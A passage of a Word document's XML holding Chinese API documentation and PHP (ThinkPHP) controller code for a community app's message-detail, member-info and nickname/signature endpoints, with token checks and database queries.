          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772F5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circle_article_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96E4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coin_id             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D745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coin_name           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86E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exchange            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DC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symbol              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838E9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content             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7369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link                </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息相关链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389552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sender_username     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者姓名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53893E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sender_img          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5328DE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sender_follow_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者关注人数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F09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{Integer} sender_article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送者发表文章数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669309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当前用户是否关注该消息发送者：</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31F2D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create_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息发送时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B995C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update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户消息阅读时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C01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2B9216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1E6957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44ED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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516174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BB8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0E328D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$data['recipient_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447BB6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90331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A82E7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3B08B2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7B23A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856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DB45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$message_id = input('param.message_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210F2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($message_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F27B7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$data['id'] = $message_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8E1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C9DB6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97756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用户消息</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724DE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94D0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1F0C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 = Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CE6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525DFE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7B0340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(!empty($message)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1F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($message['read'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B40D9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Db::name('message')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EC30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7D1B9F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27B446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'read' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC89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3D39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C2B1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$message['sender_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26B0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$message['sender_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C04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$message['sender_follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789CF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$message['sender_article_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE970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$message['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12884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$sender = _user($message['sender_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1156D5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(!empty($sender)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44A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$message['sender_username'] = $sender['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C7B7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$message['sender_img'] = $sender['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8C7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$message['sender_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148721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$message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F160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A9EC3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$message['sender_article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CB3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$message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395458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73E2AB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$message['sender_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D809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$message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5003C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CD4E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AA43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4DCC5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$message['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483AC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$message['sender_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A73F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2E3E4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6422C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B477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$message['type_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A7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($message['type_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C893F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$message['type_name'] = Db::name('message_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858F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$message['type_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08663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-&gt;value('title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F41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F9F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/*$message['coin_name'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7096C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($message['coin_id']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368B9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 = Db::name('coin')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B37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$message['coin_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840FF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0A5D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(!empty($coin)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE10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$message['coin_name'] = $coin['currency'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8B7C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38F1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985A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json($message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1F5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DE533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E53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该用户消息不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E1B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B8FB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9B82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EDF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5800C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C5950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49757C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app\api\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A38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439C19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think\db\Query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F1A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6539FE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7CEAF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5C3B16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 as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE7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2FA94C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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDEFE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Member extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C71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DC61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2318CC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0969FD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35B2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20FAE0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8740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@param Request $request Request</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C8E0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52A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@access public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416F5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C375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7874D7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7A95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3AD360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5A29F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160DB4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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CEC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FC4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71A6BE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24D9FF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5A36BA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00A0A3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2DAFEF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518E9A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66B80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D6833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618CAE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6D0418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3FBE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6E13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AFED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5CBCA3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4BE847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290EEC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8969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7EAAC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79B495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EA5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BBE4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7232F1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277557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5BA1B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66F06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0B083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7E9F5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40D49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E1EC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4734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AA738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1FB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7F021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230A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2F78C7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47818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38D0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33B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63EE76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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E473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CD48D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'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Token',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213CF9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3B49A2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EC93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F662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F333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B1C70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'Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03C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15340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2581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D408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4741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73AF9C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18C6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json(_ajaxError());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D1F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1F87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ACB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/api/member/info </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取会员信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFC0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获取会员信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EE8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666C8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D98AC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152EA4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ret        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户公开信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A1A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id      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CAE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nickname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C70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mobile   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户手机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE49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email    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户邮箱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B594E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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2AA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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A00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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5837A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{Array} guanzhu   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户关注列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A428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fensi   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户粉丝数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE31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dongtai </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户动态数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB19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fangke  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户访客数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B15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huozan  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户获赞数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B256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article_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发布文章数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404E5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circle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加入圈子数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECF0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create_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户创建时间（时间戳格式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB7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update_time </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后登录时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE767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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7212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48B7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABCA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829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42C77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8F4BF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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7063CE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3FF1CF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AAE2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C57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_user($this-&gt;memberId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA71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$member['dongtai'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5871B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-&gt;where('circle_id', 'null')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A7F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79AAD0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91C5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$member['fensi'] = Db::name('member_guanzhu')-&gt;where(['gz_uid' =&gt; $member['id']])-&gt;count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407052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$member['fangke'] = Db::name('member_fangke')-&gt;where(['f_uid' =&gt; $member['id']])-&gt;field('f_uid')-&gt;whereTime('time', 'week')-&gt;count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30226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$member['huozan'] = Db::name('article_ping_zan')-&gt;where(['uid' =&gt; $member['id']])-&gt;count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331033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$guanzhu = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; $member['id']])-&gt;field('gz_uid')-&gt;limit(6)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8AC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($guanzhu as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A5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_user($v['gz_uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72D0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(!empty($user)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6E5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$guanzhu[$k]['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416AB6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$guanzhu[$k]['img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9BC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$guanzhu[$k]['uid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D212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526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7EE2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$member['guanzhu'] = $guanzhu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB386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$member['password'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683FDF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$member['article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757775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02F2A9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2656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$member['circle_num'] = Db::name('circle_member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0B4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-&gt;where('member_id', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB3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-&gt;where('follow', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A25D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3DD9FA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$member]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E753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EB1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FA1E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/api/member/nickname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295DC1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修改会员昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC0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0AB4C3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3C0E6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2A5D6A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nickname </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户昵称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC16A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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316B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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197E18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81E0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nickname()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299EC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1A22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3A7D7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911F7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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616239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103E6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3866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C014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 input('param.nickname', '', 'strip_tags');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE85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F343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'nickname|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昵称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E8A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4B15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0F976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=&gt; $nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7A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865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34625F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E79A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1C2C63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DEB67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FFDE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0F31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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE99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$this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468FB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131C99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=&gt; $nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4AD0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1C55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29FE1E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4EB00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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1684D6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275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E51C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AB83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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D40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A324F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0E20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07EA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C015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1022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/api/member/qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改会员签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9E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修改会员签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12A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18F1E2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2955F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078B2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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户签名（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F9A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修改成功信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060305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修改失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF663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5EA6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qianming()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D7C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1DE1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0A6919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CF2CD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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B086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421A0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264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38E2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$qianming = input('param.qianming', '', 'strip_tags');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48EA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6A6A64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'qianming|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
